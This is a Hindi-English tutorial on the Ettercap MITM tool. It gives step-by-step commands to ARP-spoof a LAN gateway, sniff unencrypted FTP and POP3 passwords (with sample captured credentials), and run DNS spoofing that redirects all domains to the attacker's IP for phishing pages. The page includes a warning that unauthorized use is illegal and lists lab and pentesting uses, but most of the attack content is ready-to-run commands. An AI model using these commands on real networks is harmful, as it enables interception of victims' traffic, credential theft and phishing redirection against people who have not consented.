Ettercap

MITM Attack Framework

🎭 Ettercap क्या है?

Ettercap एक comprehensive MITM (Man-in-the-Middle) attack suite है जो LAN में network traffic को intercept, modify और analyze कर सकता है।

👉 ARP spoofing, DNS spoofing, password sniffing जैसे attacks के लिए use होता है। Both GUI और CLI versions available हैं।

🔍 Ettercap क्या-क्या कर सकता है

ARP Spoofing

Network में MITM attack perform करना

DNS Spoofing

DNS queries को redirect करना

Password Sniffing

Unencrypted passwords capture करना

Packet Filtering

Real-time में packets को modify/drop करना

Host Discovery

LAN में hosts discover करना

SSL Strip

HTTPS को HTTP में convert करना

⚙️ Kali NetHunter / Termux में Ettercap install

aptInstallation Commands

System Update

apt update && apt upgrade

Install Ettercap

apt install ettercap-text-only

👉 Termux में text-only version use करो क्योंकि GUI version नहीं चलेगा

💻 Basic Commands (Use)

👉 Commands को root के साथ run करो:

Start interactive mode

ettercap -T -i wlan0

Scan network for hosts

ettercap -T -i wlan0 -M arp:remote -P remote /192.168.1.1-255//

Simple ARP spoofing (target gateway)

ettercap -T -i wlan0 -M arp:remote /192.168.1.1//

List hosts in network

ettercap -T -i wlan0 -P list_hosts

DNS spoofing with custom hosts file

ettercap -T -i wlan0 -P dns_spoof -M arp:remote

🌐 Real Example (Practical समझ)

Example 1🎯 ARP Spoofing Attack Flow

Step-by-step ARP spoofing setup:

Step 1: Scan network for hosts

ettercap -T -i wlan0 -M arp:remote -P list_hosts

Step 2: Start MITM attack (spoof gateway)

ettercap -T -i wlan0 -M arp:remote /192.168.1.1//

Step 3: Start sniffing passwords

ettercap -T -i wlan0 -M arp:remote -P password /192.168.1.1//
📊 Output समझो (Password Sniffing)

मान लो password sniffing output कुछ ऐसा आता है:

Password : ***********
INFO : 192.168.1.10:53234 → 192.168.1.1:21 (FTP)
USER : admin
PASS : password123
INFO : 192.168.1.15:45678 → 192.168.1.1:110 (POP3)
USER : user@test.com
PASS : mysecretpass

🧠 इसका मतलब:

FTP

FTP Credentials Captured

admin / password123 on port 21

POP3

Email Credentials Captured

user@test.com / mysecretpass on port 110

⚠️ Important: Unencrypted protocols (FTP, HTTP, POP3, Telnet) से passwords easily capture हो जाते हैं। HTTPS/SSH encrypted होते हैं।

🔥 Advanced Example - DNS Spoofing

👉 DNS spoofing के लिए custom hosts file बनाओ:

Create etter.dns file

echo "* A 192.168.1.100" > etter.dns

Start DNS spoofing

ettercap -T -i wlan0 -M arp:remote -P dns_spoof -f etter.dns

Redirect All Domains

किसी भी website को अपने IP पर

Phishing Setup

Fake pages के लिए use

👉 यह attack का मतलब: Victims को google.com विज़िट करने पर भी आपका fake website दिखेगा

⚠️ CRITICAL WARNING

Ettercap एक powerful offensive tool है। बिना permission इसका use ILLEGAL है

Authorized use के cases:

  • निजी lab environment (own network)
  • Written permission के साथ pentesting
  • Educational research labs

🚫 Strictly Prohibited: Public networks, office networks, या बिना permission किसी भी network पर attack

👉 Root required: ARP spoofing और MITM attacks के लिए root permissions चाहिए

🧩 Related Tools

Bettercap

Modern MITM framework

Wireshark

Packet analyzer

Tcpdump

CLI packet capture

Nmap

Network scanning

💡 Simple समझ

Ettercap = "Network का Chor"

यह victims और gateway के बीच में बैठकर उनकी conversation सुनता है और passwords चुराता है।